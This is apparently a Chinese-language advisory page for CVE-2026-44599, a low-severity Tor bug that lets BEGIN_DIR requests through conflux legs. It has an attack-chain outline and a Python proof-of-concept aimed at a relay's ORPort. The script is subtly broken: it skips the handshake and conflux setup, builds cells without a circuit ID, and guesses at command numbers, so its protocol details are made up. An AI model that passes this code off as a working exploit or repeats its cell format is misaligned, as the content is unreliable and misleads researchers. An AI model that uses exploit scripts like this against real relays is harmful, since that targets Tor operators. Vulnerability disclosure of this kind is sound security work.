CVE-2026-44599 CVSS 3.7 低危

CVE-2026-44599 Tor conflux legs完整性漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44599

漏洞类型

逻辑漏洞

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tor

漏洞概述

Tor 0.4.9.7之前的版本存在安全漏洞，编号为CVE-2026-44599。该漏洞允许攻击者通过conflux legs尝试或接受BEGIN_DIR请求。这可能导致Tor节点的完整性受到低程度的影响。攻击者无需认证即可利用此漏洞，但攻击复杂度较高。该问题已被分配标识符TROVE-2026-008，建议用户尽快升级到最新版本。

技术细节

该漏洞源于Tor在处理conflux（多路径）连接时的逻辑缺陷。在受影响版本中，Tor节点未能正确过滤通过conflux legs传入的BEGIN_DIR命令。BEGIN_DIR命令通常用于建立匿名目录连接。由于协议实现错误，攻击者可以构造特定的网络请求，利用conflux legs绕过部分限制，导致目标节点错误地接受或尝试BEGIN_DIR操作。尽管这不会导致远程代码执行或敏感信息泄露（C:N），但违反了预期的协议流程，造成了低级别的完整性风险（I:L）。利用条件需要网络攻击向量（AV:N），且攻击复杂度较高（AC:H）。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找Tor节点，并识别运行0.4.9.7之前版本的节点。

STEP 2

建立连接

攻击者与目标Tor节点建立连接，并尝试协商conflux（多路径）扩展功能。

STEP 3

发送恶意载荷

通过已建立的conflux leg，攻击者发送BEGIN_DIR命令，该命令本应受到更严格的限制。

STEP 4

利用漏洞

目标节点错误地接受或处理该BEGIN_DIR请求，导致节点完整性受到低程度影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# Conceptual PoC for CVE-2026-44599
# This script attempts to send a BEGIN_DIR cell via a simulated conflux leg connection.
# Note: Actual exploitation requires understanding the Tor protocol handshake and conflux negotiation.

TARGET_HOST = "127.0.0.1" # Replace with target Tor relay IP
TARGET_PORT = 9001         # Replace with target Tor relay ORPort

def create_cell(cell_type, payload):
    # Simplified Tor cell creation
    header = struct.pack("!H", cell_type)
    return header + payload.ljust(509, b'\x00') # Pad to standard cell size

def send_exploit():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))
        
        # 1. Perform Tor Handshake (Versions, Certs, etc.) - Omitted for brevity
        # 2. Negotiate Conflux (if supported) - Omitted for brevity
        
        # 3. Send BEGIN_DIR cell via the established leg
        # CELL_BEGIN_DIR is typically type 8 or 9 depending on version context
        begin_dir_cell = create_cell(8, b'BEGIN_DIR_PAYLOAD')
        
        s.send(begin_dir_cell)
        print(f"[+] Sent BEGIN_DIR cell to {TARGET_HOST}:{TARGET_PORT}")
        
        response = s.recv(1024)
        print(f"[+] Received response: {response}")
        
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    send_exploit()

影响范围

Tor < 0.4.9.7

防御指南

临时缓解措施

在未升级前，建议监控网络流量中异常的BEGIN_DIR请求，并严格限制conflux功能的网络访问控制列表，以减少潜在的攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表